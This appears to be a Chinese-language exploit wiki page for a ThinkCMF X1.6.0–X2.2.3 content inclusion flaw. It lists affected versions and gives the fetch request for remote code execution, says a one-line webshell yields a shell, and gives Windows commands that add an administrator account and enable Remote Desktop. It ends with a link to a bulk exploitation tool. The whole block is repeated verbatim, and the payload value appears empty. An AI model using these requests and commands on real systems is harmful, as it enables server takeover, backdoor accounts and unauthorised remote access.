# ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞
= ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞 =
==影響版本:==
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
==漏洞利用:==
使用a參數的fetch方法,實現遠程代碼執行
?a=fetch&templateFile=public/index&prefix=''&content=
訪問:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=''&content=
訪問:
http://127.0.0.1/cmfx/test.php
即可顯示PHPINFO信息。
修改Payload爲一句話木馬即可Getshell。
=====新建用戶並添加到管理員組,開啟遠程桌面連接(對於Windows):=====
net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
= ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞 =
==影響版本:==
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
==漏洞利用:==
使用a參數的fetch方法,實現遠程代碼執行
?a=fetch&templateFile=public/index&prefix=''&content=
訪問:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=''&content=
訪問:
http://127.0.0.1/cmfx/test.php
即可顯示PHPINFO信息。
修改Payload爲一句話木馬即可Getshell。
=====新建用戶並添加到管理員組,開啟遠程桌面連接(對於Windows):=====
net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
== thinkcmf批量利用工具 ==
[https://github.com/Anonymous-ghost/AttackWebFrameworkTools Thinkcmf批量利用工具]













请登录后查看评论内容